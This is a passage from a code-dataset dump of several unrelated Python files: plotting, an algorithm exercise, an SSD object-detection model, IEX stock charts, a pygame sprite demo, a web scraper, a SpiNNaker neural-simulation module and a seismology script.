ax[0].plot(t,tc)\n labels1 +=[nm]\n ax[0].legend(labels1,prop={'size': 14})\n for nm,tc in y2.items():\n if nm == 'EX_glc__D_e' or nm == 'EX_o2_e':\n ax[1].plot(t,tc)\n labels2 +=[nm]\n ax[1].legend(labels2,prop={'size': 14})\n\n plt.savefig(direct + \"/\" + \"_\".join([st.replace('.','') for st in desired_models]))\n","repo_name":"jdbrunner/surfin_fba","sub_path":"surfinFBA/examples/direct_meth.py","file_name":"direct_meth.py","file_ext":"py","file_size_in_byte":8896,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"53"} +{"seq_id":"21749641201","text":"while True:\n try:\n n = int(input())\n except:\n break\n\n num = 0\n cnt = 1\n while True:\n num = num * 10 + 1\n num = num % n\n if num == 0:\n print(cnt)\n break\n cnt += 1\n\n# #숏코딩\n# import sys\n# def f(n,i=1):\n# while i % int(n) != 0:\n# i = i * 10 + 1\n# print(len(str(i)))\n\n# *map(f,sys.stdin),","repo_name":"shinlama/TIL","sub_path":"Algorithms/boj_4375_one.py","file_name":"boj_4375_one.py","file_ext":"py","file_size_in_byte":376,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10033983836","text":"import tensorflow as tf\nimport tensorflow.contrib.slim as slim\nfrom hyperparameters import *\n\ndef load_vgg(sess, vgg_path):\n\n tf.saved_model.loader.load(sess, ['vgg16'], vgg_path)\n images = tf.get_default_graph().get_tensor_by_name('image_input:0')\n conv4_3_pool = tf.get_default_graph().get_tensor_by_name('pool4:0')\n conv4_3_relu = tf.get_default_graph().get_tensor_by_name('conv4_3/Relu:0') \n keep_prob = tf.get_default_graph().get_tensor_by_name('keep_prob:0')\n\n return images, conv4_3_pool, conv4_3_relu, keep_prob\n\n\ndef confidences_and_locations(net, layer_id, Confidences, Locations):\n\n with tf.variable_scope('prediction_and_location_'+layer_id):\n \n num_anchors = (NUMBER_DEFAULT_BOXES)\n prediction = slim.conv2d(net, num_anchors*NUMBER_CLASSES, [3,3], \n activation_fn=None, scope='prediction', padding='SAME')\n prediction = tf.contrib.layers.flatten(prediction)\n location = slim.conv2d(net, num_anchors*4, [3,3], activation_fn=None, scope='location')\n location = tf.contrib.layers.flatten(location)\n\n Confidences.append(prediction)\n Locations.append(location)\n\n return Confidences, Locations\n\n\ndef ssd_layers(conv4_3, conv4_3_relu):\n\n Confidences, Locations = [], []\n\n Confidences, Locations = confidences_and_locations(conv4_3_relu, 'ssd_0_vgg_', Confidences, Locations)\n\n with tf.variable_scope(\"ssd_300\"):\n with slim.arg_scope([slim.conv2d], normalizer_fn=slim.batch_norm, \n weights_regularizer=slim.l2_regularizer(1e-3),\n padding='SAME'):\n\n\n net = slim.conv2d(conv4_3, 1024, [3,3], scope='ssd_0')\n net = slim.conv2d(net, 1024, [1,1], scope='ssd_1')\n\n Confidences, Locations = confidences_and_locations(net, 'ssd_1', Confidences, Locations)\n\n net = slim.conv2d(net, 256, [1,1], scope='ssd_2')\n net = slim.conv2d(net, 512, [3,3], 2, scope='ssd_2_s2')\n \n Confidences, Locations = confidences_and_locations(net, 'ssd_2_s2', Confidences, Locations)\n\n net = slim.conv2d(net, 128, [1,1], scope='ssd_3')\n net = slim.conv2d(net, 256, [3,3], 2, scope='ssd_3_s2')\n\n Confidences, Locations = confidences_and_locations(net, 'ssd_3_s2', Confidences, Locations)\n \n final_Confidences = tf.concat(Confidences, 1)\n final_Locations = tf.concat(Locations, 1)\n \n return final_Confidences, final_Locations\n\n\ndef loss_function(confidences_all, locations_all):\n\n true_confidences = tf.placeholder(tf.int32, [None, NUMBER_CONFIDENCES], name=\"true_predictions\")\n confidence_loss_mask = tf.placeholder(tf.float32, [None, NUMBER_CONFIDENCES], name=\"prediction_mask\")\n true_locations = tf.placeholder(tf.float32, [None, NUMBER_LOCATIONS], name=\"true_locations\")\n \n confidences = tf.reshape(confidences_all, [-1, NUMBER_CONFIDENCES, NUMBER_CLASSES])\n prediction_loss = tf.nn.sparse_softmax_cross_entropy_with_logits(logits=confidences, labels=true_confidences)\n prediction_loss *= confidence_loss_mask\n prediction_loss = tf.reduce_sum(prediction_loss)\n\n location_difference = true_locations - locations_all\n location_loss_l2 = .5 * (pow(location_difference, 2))\n location_loss_l1 = tf.abs(location_difference) - .5\n smooth_l1 = tf.less(tf.abs(location_difference), 1.0)\n location_loss = tf.where(smooth_l1, location_loss_l2, location_loss_l1)\n location_loss_mask = tf.minimum(true_confidences, 1)\n location_loss_mask = tf.to_float(location_loss_mask)\n\n location_loss_mask = tf.stack([location_loss_mask] * 4, axis=2) \n location_loss_mask = tf.reshape(location_loss_mask, [-1, NUMBER_LOCATIONS])\n location_loss *= location_loss_mask\n location_loss = tf.reduce_sum(location_loss)\n\n loss = prediction_loss + location_loss + tf.reduce_sum(tf.losses.get_regularization_losses())\n \n tf.summary.histogram(\"location_difference\", location_difference)\n tf.summary.histogram(\"logits\", confidences)\n tf.summary.histogram(\"prediction_loss\", prediction_loss)\n tf.summary.histogram(\"location loss\", location_loss)\n tf.summary.histogram(\"loss\", loss)\n\n all_probabilities = tf.nn.softmax(confidences)\n probabilities, probability_confidences = tf.nn.top_k(all_probabilities)\n \n tf.summary.histogram(\"probabilities\", probabilities)\n tf.summary.histogram(\"probability_confidences\", probability_confidences)\n\n probabilities = tf.reshape(probabilities, [-1, NUMBER_CONFIDENCES])\n probability_confidences = tf.reshape(probability_confidences, [-1, NUMBER_CONFIDENCES])\n \n tf.summary.histogram(\"probability_confidences\", probability_confidences)\n\n return loss, probabilities, probability_confidences, true_locations, true_confidences, confidence_loss_mask\n\n\n\ndef optimizer(loss):\n\n adam = tf.train.AdamOptimizer(LEARNING_RATE).minimize(loss)\n\n return adam\n\n\n","repo_name":"anthony-sarkis/deep-traffic-lights","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":4961,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"73728905","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nfrom iexfinance.stocks import get_historical_data\nfrom iexfinance.stocks import Stock\nfrom datetime import datetime\nfrom pandas.plotting import register_matplotlib_converters\nregister_matplotlib_converters()\nimport matplotlib.pyplot as pyplot\nimport matplotlib.dates as dates\nimport mpl_finance as mpfold\nimport json\nimport os\nstrRoot='D:\\\\denbrige\\\\180 FxOption\\\\103 FxOptionVerBack\\\\083 FX-Git-Pull\\\\14docktrader\\\\config\\\\'\nwith open(strRoot + 'iex.conf') as fJsn:\n jsnIEX = json.load(fJsn)\n\n\n# In[2]:\n\n\n# list of tickers to be processed\ndef GetStockTicker():\n strTicker = []\n strInput = input(\"Do you want to load sp500_constituents (y/n)?: \")\n if strInput in ('y', 'Y'):\n strStockFile = \"stockrow/sp500_constituents.csv\"\n if os.path.exists(strStockFile) == True:\n file=open(strStockFile, \"r\")\n reader = csv.reader(file)\n #skip header\n next(reader) \n for line in reader:\n strTicker.append(line[0])\n else:\n print(\"Error: \" + strStockFile + \" undefined\")\n elif strInput in ('n', 'N'):\n strInput = input(\"Enter ticker(s) delimited by comma: \")\n for ticker in strInput.split(','):\n strTicker.append(ticker)\n else:\n print(\"Error: User response undefined\")\n return strTicker\n\n\n# In[3]:\n\n\ndef IexStockTicker(ticker):\n # assert ticker is not empty\n if len(ticker) == 0:\n return\n \n for i in ticker:\n objStock = Stock(i, output_format='pandas', token=jsnIEX['iextoken'])\n dfCompany = objStock.get_company()\n print('\\nTicker: ' + i)\n print('CEO: ' + dfCompany.loc['CEO'][0])\n print('Company: ' + dfCompany.loc['companyName'][0])\n print('Desc: ' + dfCompany.loc['description'][0])\n print('No. of Employees: ' + str(dfCompany.loc['employees'][0]))\n print('Exchange: ' + dfCompany.loc['exchange'][0])\n print('Industry: ' + dfCompany.loc['industry'][0])\n print('Sector: ' + dfCompany.loc['sector'][0])\n print('Tags: ' + ','.join(dfCompany.loc['tags'][0]))\n print('')\n dfEst = objStock.get_estimates()\n print('Fiscal Period: ' + dfEst.loc['fiscalPeriod'][0])\n print('Report Date: ' + dfEst.loc['reportDate'][0])\n print('Consensus EPS: ' + str(dfEst.loc['consensusEPS'][0]))\n print('No. of Ests: ' + str(dfEst.loc['numberOfEstimates'][0]))\n print('Fiscal EndDate: ' + dfEst.loc['fiscalEndDate'][0])\n\ndef MpfPlotWave(ticker):\n # assert ticker is not empty\n if len(ticker) == 0:\n return\n \n start=datetime(2019, 2, 9)\n end=datetime(2020,2,11)\n \n # values that can be parameterized\n intEmaPeriod = 34\n intBars = 90\n\n row=0\n for i in ticker:\n ohlc = get_historical_data(i, start, end, output_format='pandas', token=jsnIEX['iextoken'])\n ohlc.columns=[\"Open\", \"High\", \"Low\", \"Close\", \"Volume\"]\n if (intBars+intEmaPeriod > len(ohlc)):\n print(\"Error: Bars + EmaPeriod exceeds ohlc \" + str(len(ohlc)-intBars-intEmaPeriod))\n return\n\n hEma = ohlc['High'].ewm(intEmaPeriod).mean()\n cEma = ohlc['Close'].ewm(intEmaPeriod).mean()\n lEma = ohlc['Low'].ewm(intEmaPeriod).mean()\n \n # extract OHLC into a list of lists\n lohlc = ohlc[['Open', 'High', 'Low', 'Close']].values.tolist()\n \n # convert dates in datetime format to mathplotlib dates\n mdates = dates.date2num(ohlc.index)\n \n # prepare ohlc in mathplotlib format\n mohlc = [ [mdates[i]] + lohlc[i] for i in range(len(mdates)) ]\n \n # set default font sizes\n params = {'axes.labelsize': 20,'axes.titlesize': 24}\n pyplot.rcParams.update(params)\n \n fig, ax = pyplot.subplots(figsize = (24,24))\n \n # set default tick sizes\n ax.tick_params(axis='both', which='major', labelsize=20)\n ax.tick_params(axis='both', which='minor', labelsize=18)\n \n # mpfold.plot_day_summary_ohlc(ax, mohlc[-50:], ticksize=5, colorup='#77d879', colordown='#db3f3f') # alternatively, use a barchart\n mpfold.candlestick_ohlc(ax, mohlc[-intBars:], width=0.4, colorup='#77d879', colordown='#db3f3f')\n ax.plot(hEma[-intBars:], color='red', linewidth=2, label='high, '+str(intEmaPeriod)+'-Day EMA')\n ax.plot(cEma[-intBars:], color='green', linewidth=2, label='close, '+str(intEmaPeriod)+'-Day EMA')\n ax.plot(lEma[-intBars:], color='blue', linewidth=2, label='low, '+str(intEmaPeriod)+'-Day EMA')\n\n ax.set_xlabel('Date')\n ax.set_ylabel('Price')\n ax.set_title(i +' Chart with '+str(intEmaPeriod)+'-Day EMA Wave')\n ax.legend(fontsize=20)\n ax.xaxis.set_major_formatter(dates.DateFormatter('%b %d'))\n fig.autofmt_xdate() \n \n # plt.show() # add this if you're not using Jupyter Notebook\n\n\n# In[4]:\n\n\nstrTicker = GetStockTicker()\nprint('No. of tickers:', len(strTicker))\nIexStockTicker(strTicker)\n\n\n# In[5]:\n\n\nMpfPlotWave(strTicker)\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"dennislwm/docktrader","sub_path":"src/006iexpiece.py","file_name":"006iexpiece.py","file_ext":"py","file_size_in_byte":5099,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"53"} +{"seq_id":"21877628706","text":"import pygame\r\nimport sys\r\n\r\n# Initialize Pygame and create a window\r\npygame.init()\r\nscreen_width, screen_height = 600, 500\r\nscreen = pygame.display.set_mode((screen_width, screen_height))\r\npygame.display.set_caption(\"Mario\")\r\n\r\n# Load the images of Mario running\r\nplyer_image = [pygame.image.load(\"Bilder/oben.png\").convert_alpha(),\r\n pygame.image.load(\"Bilder/unten.png\").convert_alpha(),\r\n pygame.image.load(\"Bilder/rechts.png\").convert_alpha(),\r\n pygame.image.load(\"Bilder/links.png\").convert_alpha(),\r\n pygame.image.load(\"Bilder/left1.png\").convert_alpha(),\r\n pygame.image.load(\"Bilder/right1.png\").convert_alpha()]\r\n\r\ndef move_stone(x, y, plyer_rect):\r\n keys = pygame.key.get_pressed()\r\n if keys[pygame.K_UP]:\r\n y -= speed\r\n if keys[pygame.K_DOWN]:\r\n y += speed\r\n if keys[pygame.K_LEFT]:\r\n x -= speed\r\n if keys[pygame.K_RIGHT]:\r\n x += speed\r\n\r\n # Calculate the distance between the player and the stone\r\n distance = plyer_rect.right - x\r\n\r\n # If the player is on the left of the stone, the distance is 5 or lower, and the player is moving to the right, move the stone to the right as well\r\n if plyer_rect.x < x and distance <= 5 and keys[pygame.K_d]:\r\n x += speed\r\nStein_img = pygame.image.load(\"Bilder/Steine/1.png\").convert_alpha()\r\nstein = pygame.transform.smoothscale(Stein_img,(30,30))\r\nstein_rect = stein.get_rect(x=200, y=200)\r\n\r\n# Load the background image and scale it to fit the screen\r\no_background = pygame.image.load(\"Bilder/background.jpg\").convert_alpha()\r\nbackground = pygame.transform.scale(o_background, (screen_width, screen_height))\r\n\r\n# Set the player's initial position and speed\r\nplyer = plyer_image[1]\r\nplyer_rect = plyer_image[1].get_rect(x=100, y=200)\r\nspeed = 5\r\n\r\n# Create a clock to control the frame rate\r\nclock = pygame.time.Clock()\r\n\r\n# Main game loop\r\nwhile True:\r\n # Handle events\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n pygame.quit()\r\n sys.exit()\r\n\r\n # Update the player's position based on key input\r\n keys = pygame.key.get_pressed()\r\n if keys[pygame.K_UP]:\r\n plyer = plyer_image[0]\r\n plyer_rect.move_ip(0, -speed)\r\n if keys[pygame.K_DOWN]:\r\n plyer = plyer_image[1]\r\n plyer_rect.move_ip(0, speed)\r\n if keys[pygame.K_RIGHT]:\r\n if pygame.time.get_ticks() % 100 < 50:\r\n plyer = plyer_image[2]\r\n else:\r\n plyer = plyer_image[5]\r\n plyer_rect.move_ip(speed, 0)\r\n if keys[pygame.K_LEFT]:\r\n if pygame.time.get_ticks() % 100 < 50:\r\n plyer = plyer_image[3]\r\n else:\r\n plyer = plyer_image[4]\r\n plyer_rect.move_ip(-speed, 0)\r\n\r\n dist_rl1 = plyer_rect.top - stein_rect.top\r\n dist_r2 = plyer_rect.right - stein_rect.left\r\n dist_l2 = plyer_rect.left - stein_rect.right\r\n\r\n dist_tb1 = plyer_rect.left - stein_rect.left\r\n dist_t2 = plyer_rect.bottom - stein_rect.top\r\n dist_b2 = plyer_rect.top - stein_rect.bottom\r\n\r\n\r\n #!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\r\n #Here the plyer gltiches, we have to play with the nums to fix it\r\n if dist_rl1 >= -50 and dist_rl1 <= 20 and dist_r2 >-5 and dist_r2 <5 and keys[pygame.K_RIGHT]:\r\n stein_rect.x += speed\r\n\r\n if dist_rl1 >= -50 and dist_rl1 <= 20 and dist_l2 == 0 and keys[pygame.K_LEFT]:\r\n stein_rect.x -= speed\r\n\r\n if dist_tb1 >= -20 and dist_tb1 <= 20 and dist_t2 < 5 and dist_t2 >-4 and keys[pygame.K_DOWN]:\r\n stein_rect.y += speed\r\n\r\n if dist_tb1 >= -20 and dist_tb1 <= 20 and dist_b2 <= 0 and dist_b2 >-5 and keys[pygame.K_UP]:\r\n stein_rect.y -= speed\r\n\r\n if pygame.time.get_ticks()%1000 < 50/3:\r\n print(dist_t2)\r\n\r\n # Keep the player within the screen boundaries\r\n if plyer_rect.bottom > screen_height:\r\n plyer_rect.bottom = screen_height\r\n if plyer_rect.right > screen_width:\r\n plyer_rect.right = screen_width\r\n if plyer_rect.top < 0:\r\n plyer_rect.top = 0\r\n if plyer_rect.left < 0:\r\n plyer_rect.left = 0\r\n\r\n # Clear the screen and draw the background and player\r\n screen.blit(background, (0, 0))\r\n screen.blit(plyer, plyer_rect)\r\n screen.blit(stein, stein_rect)\r\n\r\n\r\n # Update the display\r\n pygame.display.update()\r\n\r\n # Limit the frame rate to 60 FPS\r\n clock.tick(60)\r\n\r\n\r\n\r\n","repo_name":"impecableCoders/SuperMario","sub_path":"Marrio Moma/Test.py","file_name":"Test.py","file_ext":"py","file_size_in_byte":4429,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"21683819592","text":"import requests\nfrom bs4 import BeautifulSoup\n\nreq = requests.get('https://www.naver.com/').text\nprint(req)\nsoup = BeautifulSoup(req, 'html.parser')\n# print(soup)\ntop10 = soup.select('.PM_CL_realtimeKeyword_rolling .ah_item .ah_k')\n\nfor item in top10:\n print(item.text)","repo_name":"gtj1323/DjangoStudy","sub_path":"menufactual_file/scraping_ex/naver.py","file_name":"naver.py","file_ext":"py","file_size_in_byte":272,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17042991344","text":"# Import modules\nimport enum\nimport itertools\nimport logging\nimport numpy as np\nimport regions\nfrom rig import machine\n\n# Import classes\nfrom collections import defaultdict\nfrom rig_cpp_common.regions import Profiler, Statistics, System\nfrom rig_cpp_common.utils import Args\n\n# Import functions\nfrom rig_cpp_common.utils import load_regions\nfrom six import iteritems\nfrom utils import (calc_bitfield_words, calc_slice_bitfield_words,\n get_model_executable_filename, split_slice)\n\nlogger = logging.getLogger(\"pynn_spinnaker\")\n\n\n# ----------------------------------------------------------------------------\n# Regions\n# ----------------------------------------------------------------------------\nclass Regions(enum.IntEnum):\n \"\"\"Region names, corresponding to those defined in `ensemble.h`\"\"\"\n system = 0\n neuron = 1\n synapse = 2\n input_buffer = 3\n back_prop_output = 4\n flush = 5\n intrinsic_plasticity = 6\n spike_recording = 7\n analogue_recording_0 = 8\n analogue_recording_1 = 9\n analogue_recording_2 = 10\n analogue_recording_3 = 11\n analogue_recording_start = analogue_recording_0\n analogue_recording_end = analogue_recording_3 + 1\n profiler = analogue_recording_end\n statistics = analogue_recording_end + 1\n\n\n# ----------------------------------------------------------------------------\n# Vertex\n# ----------------------------------------------------------------------------\nclass Vertex(object):\n def __init__(self, parent_keyspace, neuron_slice, pop_index, vert_index):\n self.neuron_slice = neuron_slice\n\n # Build child keyspaces for spike and\n # flush packets coming from this vertex\n self.spike_keyspace = parent_keyspace(pop_index=pop_index,\n vert_index=vert_index,\n flush=0)\n self.flush_keyspace = parent_keyspace(pop_index=pop_index,\n vert_index=vert_index,\n flush=1)\n\n self.vert_index = vert_index\n\n self.input_verts = []\n self.back_prop_out_buffers = None\n self.region_memory = None\n\n # ------------------------------------------------------------------------\n # Magic methods\n # ------------------------------------------------------------------------\n def __str__(self):\n return \"\" % (str(self.neuron_slice))\n\n # ------------------------------------------------------------------------\n # Public methods\n # ------------------------------------------------------------------------\n def get_back_prop_in_buffer(self, post_slice):\n # Check the slices involved overlap and that this\n # neuron vertex actually has back propagation buffers\n assert post_slice.overlaps(self.neuron_slice)\n assert self.back_prop_out_buffers is not None\n\n # Calculate start and end bit in neuron id-space\n neuron_start_bit = max(post_slice.start, self.neuron_slice.start)\n neuron_end_bit = min(post_slice.stop, self.neuron_slice.stop)\n logger.debug(\"\\t\\t\\tNeuron start bit:%u, Neuron end bit:%u\",\n neuron_start_bit, neuron_end_bit)\n\n # Calculate where in the buffer post_slice starts\n buffer_start_bit = neuron_start_bit - self.neuron_slice.start\n assert buffer_start_bit >= 0\n\n # Seperate where the buffer starts in words and bits\n buffer_start_word = buffer_start_bit // 32\n buffer_start_bit -= (buffer_start_word * 32)\n buffer_end_bit = (neuron_end_bit - neuron_start_bit) + buffer_start_bit\n buffer_num_words = calc_bitfield_words(buffer_end_bit)\n logger.debug(\"\\t\\t\\tBuffer start word:%u, Buffer start bit:%u, Buffer end bit:%u, Buffer num words:%u\",\n buffer_start_word, buffer_start_word,\n buffer_end_bit, buffer_num_words)\n\n # Return offset pointers into out buffers\n return (\n [b + (buffer_start_word * 4) for b in self.back_prop_out_buffers],\n buffer_num_words, buffer_start_bit, buffer_end_bit)\n\n # ------------------------------------------------------------------------\n # Properties\n # ------------------------------------------------------------------------\n @property\n def spike_tx_key(self):\n return self.spike_keyspace.get_value(tag=\"transmission\")\n\n @property\n def flush_tx_key(self):\n return self.flush_keyspace.get_value(tag=\"transmission\")\n\n @property\n def routing_key(self):\n # Check that routing key for the spike and flush keyspace are the same\n spike_key = self.spike_keyspace.get_value(tag=\"routing\")\n flush_key = self.flush_keyspace.get_value(tag=\"routing\")\n assert spike_key == flush_key\n\n # Return the spike key (arbitarily)\n return spike_key\n\n @property\n def routing_mask(self):\n # Check that routing mask for the spike and flush keyspace are the same\n spike_mask = self.spike_keyspace.get_mask(tag=\"routing\")\n flush_mask = self.flush_keyspace.get_mask(tag=\"routing\")\n assert spike_mask == flush_mask\n\n # Return the spike mask (arbitarily)\n return spike_mask\n\n\n# -----------------------------------------------------------------------------\n# NeuralCluster\n# -----------------------------------------------------------------------------\nclass NeuralCluster(object):\n # Tag names, corresponding to those defined in neuron_processor.h\n profiler_tag_names = {\n 0: \"Synapse shape\",\n 1: \"Update neurons\",\n 2: \"Apply buffer\",\n }\n\n # Names of statistics\n statistic_names = (\n \"task_queue_full\",\n \"timer_event_overflows\",\n )\n\n def __init__(self, pop_id, cell_type, parameters, initial_values,\n sim_timestep_ms, timer_period_us, sim_ticks,\n record_sample_interval, indices_to_record, config,\n vertex_load_applications, vertex_run_applications,\n vertex_resources, keyspace, post_synaptic_width,\n requires_back_prop, pop_size):\n # Create standard regions\n self.regions = {}\n self.regions[Regions.system] = System(timer_period_us, sim_ticks)\n self.regions[Regions.neuron] = cell_type._neuron_region_class(\n cell_type, parameters, initial_values, sim_timestep_ms, pop_size)\n self.regions[Regions.back_prop_output] = regions.SDRAMBackPropOutput(\n requires_back_prop)\n self.regions[Regions.flush] = regions.Flush(config.flush_time,\n sim_timestep_ms)\n self.regions[Regions.spike_recording] = regions.SpikeRecording(\n indices_to_record, sim_timestep_ms, sim_ticks)\n self.regions[Regions.statistics] = Statistics(len(self.statistic_names))\n\n # If cell type has any receptors i.e. any need for synaptic input\n if len(cell_type.receptor_types) > 0:\n # Add a synapse region and an input buffer\n self.regions[Regions.synapse] = regions.ParameterSpace(\n cell_type._synapse_mutable_param_map,\n cell_type._synapse_immutable_param_map,\n parameters, initial_values, pop_size,\n sim_timestep_ms=sim_timestep_ms)\n\n self.regions[Regions.input_buffer] = regions.InputBuffer()\n\n # If cell type has an intrinsic plasticity parameter map\n if hasattr(cell_type, \"intrinsic_plasticity_param_map\"):\n self.regions[Regions.intrinsic_plasticity] =\\\n regions.HomogeneousParameterSpace(\n cell_type._intrinsic_plasticity_param_map,\n parameters,\n sim_timestep_ms)\n\n # Assert that there are sufficient analogue\n # recording regions for this celltype's needs\n num_analogue_rec_regions = Regions.analogue_recording_end -\\\n Regions.analogue_recording_start\n assert num_analogue_rec_regions >= (len(cell_type.recordable) - 1)\n\n # Loop through cell's non-spike recordables\n # and create analogue recording regions\n # **HACK** this assumes the first entry is spike\n for i, v in enumerate(cell_type.recordable[1:]):\n self.regions[Regions(Regions.analogue_recording_start + i)] =\\\n regions.AnalogueRecording(indices_to_record, v,\n record_sample_interval,\n sim_timestep_ms, sim_ticks)\n\n # Add profiler region if required\n if config.num_profile_samples is not None:\n self.regions[Regions.profiler] =\\\n Profiler(config.num_profile_samples)\n\n # Split population slice\n neuron_slices = split_slice(pop_size, post_synaptic_width)\n\n # Build neuron vertices for each slice,\n # allocating a keyspace for each vertex\n self.verts = [Vertex(keyspace, neuron_slice, pop_id, vert_id)\n for vert_id, neuron_slice in enumerate(neuron_slices)]\n\n # Get neuron executable name\n neuron_app = get_model_executable_filename(\n \"neuron_\", cell_type, config.num_profile_samples is not None)\n\n logger.debug(\"\\t\\tNeuron application:%s\", neuron_app)\n logger.debug(\"\\t\\t%u neuron vertices\", len(self.verts))\n\n # Loop through neuron vertices and their corresponding resources\n for v in self.verts:\n # Add application to dictionary\n vertex_run_applications[v] = neuron_app\n\n # Estimate SDRAM usage and check\n # it's an integer as otherwise C CSA fails\n sdram = self._estimate_sdram(v.neuron_slice)\n assert isinstance(sdram, int)\n\n logger.debug(\"\\t\\t\\tVertex %s: %u bytes SDRAM\", v, sdram)\n\n # Add resources to dictionary\n vertex_resources[v] = {machine.Cores: 1, machine.SDRAM: sdram}\n\n # --------------------------------------------------------------------------\n # Public methods\n # --------------------------------------------------------------------------\n def allocate_out_buffers(self, placements, allocations,\n machine_controller):\n # Loop through vertices\n for v in self.verts:\n # Get placement and allocation\n vertex_placement = placements[v]\n vertex_allocation = allocations[v]\n\n # Get core this vertex should be run on\n core = vertex_allocation[machine.Cores]\n assert (core.stop - core.start) == 1\n\n logger.debug(\"\\t\\tVertex %s (%u, %u, %u)\",\n v, vertex_placement[0], vertex_placement[1],\n core.start)\n\n # Select placed chip\n with machine_controller(x=vertex_placement[0],\n y=vertex_placement[1]):\n # If back propagation is enabled, allocate two back\n # propagation out buffers for this neuron vertex\n if self.regions[Regions.back_prop_output].enabled:\n back_prop_buffer_bytes =\\\n calc_slice_bitfield_words(v.neuron_slice) * 4\n v.back_prop_out_buffers = [\n machine_controller.sdram_alloc(back_prop_buffer_bytes,\n clear=True)\n for _ in range(2)]\n\n def load(self, placements, allocations, machine_controller):\n # Loop through vertices\n for v in self.verts:\n # Get placement and allocation\n vertex_placement = placements[v]\n vertex_allocation = allocations[v]\n\n # Get core this vertex should be run on\n core = vertex_allocation[machine.Cores]\n assert (core.stop - core.start) == 1\n\n logger.debug(\"\\t\\t\\tVertex %s (%u, %u, %u): Spike key:%08x, Flush key:%08x\",\n v, vertex_placement[0], vertex_placement[1],\n core.start, v.spike_tx_key, v.flush_tx_key)\n\n # Select placed chip\n with machine_controller(x=vertex_placement[0],\n y=vertex_placement[1]):\n # Get the input buffers from each synapse vertex\n in_buffers = [\n s.get_in_buffer(v.neuron_slice)\n for s in v.input_verts]\n\n # Get regiona arguments\n region_arguments = self._get_region_arguments(\n v.spike_tx_key, v.flush_tx_key, v.neuron_slice,\n in_buffers, v.back_prop_out_buffers)\n\n # Load regions\n v.region_memory = load_regions(self.regions, region_arguments,\n machine_controller, core,\n logger)\n\n def read_recorded_spikes(self):\n # Loop through all neuron vertices and read spike times into dictionary\n spike_times = {}\n region = self.regions[Regions.spike_recording]\n for v in self.verts:\n region_mem = v.region_memory[Regions.spike_recording]\n spike_times.update(region.read_spike_times(v.neuron_slice,\n region_mem))\n return spike_times\n\n def read_recorded_signal(self, channel):\n # Get index of channelread_profile\n region_index = Regions(Regions.analogue_recording_start + channel)\n region = self.regions[region_index]\n\n # Loop through all neuron vertices and read signal\n signal = {}\n for v in self.verts:\n region_mem = v.region_memory[region_index]\n signal.update(region.read_signal(v.neuron_slice, region_mem))\n\n return signal\n\n def read_profile(self):\n # Get the profile recording region and\n region = self.regions[Regions.profiler]\n\n # Return profile data for each vertex that makes up population\n return [(v.neuron_slice.python_slice,\n region.read_profile(v.region_memory[Regions.profiler],\n self.profiler_tag_names))\n for v in self.verts]\n\n def read_statistics(self):\n # Get the statistics recording region\n region = self.regions[Regions.statistics]\n\n # Read stats from all vertices\n return region.read_stats(\n [v.region_memory[Regions.statistics] for v in self.verts],\n self.statistic_names)\n\n # --------------------------------------------------------------------------\n # Private methods\n # --------------------------------------------------------------------------\n def _estimate_sdram(self, vertex_slice):\n # Begin with size of spike recording region\n sdram = self.regions[Regions.spike_recording].sizeof(vertex_slice);\n\n # Add on size of neuron region\n sdram += self.regions[Regions.neuron].sizeof(vertex_slice)\n \n # If profiler region exists, add its size\n if Regions.profiler in self.regions:\n sdram += self.regions[Regions.profiler].sizeof()\n\n # Loop through possible analogue recording regions\n for t in range(Regions.analogue_recording_start,\n Regions.analogue_recording_end):\n # If region exists, add its size to total\n if Regions(t) in self.regions:\n sdram += self.regions[Regions(t)].sizeof(vertex_slice)\n\n return sdram\n\n def _get_region_arguments(self, spike_tx_key, flush_tx_key, vertex_slice,\n in_buffers, back_prop_out_buffers):\n region_arguments = defaultdict(Args)\n\n analogue_recording_regions = range(Regions.analogue_recording_start,\n Regions.analogue_recording_end)\n # Add vertex slice to regions that require it\n for r in itertools.chain((Regions.neuron,\n Regions.synapse,\n Regions.spike_recording),\n analogue_recording_regions):\n region_arguments[r] = Args(vertex_slice)\n\n # Add kwargs for regions that require them\n region_arguments[Regions.system].kwargs[\"application_words\"] =\\\n [spike_tx_key, flush_tx_key, len(vertex_slice)]\n region_arguments[Regions.input_buffer].kwargs[\"in_buffers\"] =\\\n in_buffers\n region_arguments[Regions.back_prop_output].kwargs[\"out_buffers\"] =\\\n back_prop_out_buffers\n return region_arguments\n","repo_name":"project-rig/pynn_spinnaker","sub_path":"pynn_spinnaker/spinnaker/neural_cluster.py","file_name":"neural_cluster.py","file_ext":"py","file_size_in_byte":16750,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21530879637","text":"#!/usr/bin/env python\nfrom obspy.core import UTCDateTime\nfrom obspy.clients.fdsn import Client\nfrom obspy.signal.spectral_estimation import get_nlnm, get_nhnm\nfrom scipy.optimize import fmin\nfrom scipy import signal\nimport matplotlib.pyplot as plt\nimport numpy as np\nstime = UTCDateTime('2019-271T00:00:00')\netime = stime + 1*24*60*60\n\n# This code generates figure 2 of Ringler et al. magnetic paper.\n\nimport matplotlib as mpl\nmpl.rc('font',family='serif')\nmpl.rc('font',serif='Times')\n#mpl.rc('text', usetex=True)\nmpl.rc('font',size=16)\n\nchans = ['LH1', 'LH2', 'LHZ']\nlocs = ['10', '00']\nfig = plt.figure(2, figsize=(16,16))\nfor idx, loc in enumerate(locs):\n plt.subplot(2,2,2*idx+1)\n for chan in chans:\n\n #net, sta, loc, chan = 'TA', 'H22K', '*', 'LHZ'\n net, sta = 'IU', 'COLA'\n\n pmax = 1./2000.\n pmin = 1./10.\n\n client = Client()\n st = client.get_waveforms(net, sta, 